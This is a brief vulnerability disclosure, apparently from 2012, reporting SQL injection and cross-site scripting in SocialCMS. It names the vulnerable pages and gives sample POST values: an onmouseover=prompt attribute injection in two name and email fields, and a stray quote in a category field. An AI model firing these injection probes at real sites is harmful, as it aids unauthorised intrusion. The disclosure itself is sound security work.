# Exploit Title: SocialCMS SQL Injection and XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL Injection and XSS can be done using the POST method.

Vulnerable Page:
ajax/commentajax.php (SQL Injection)
premium_demo/search.php (XSS)


Example:
URL encoded POST input TREF_email_address was set to "  
onmouseover=prompt(908768) bad="
and
URL encoded POST input TR_name was set to " onmouseover=prompt(910836) bad="
URL encoded POST input category was set to 1'


POC:
http://socialcms.com/premium_demo/


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr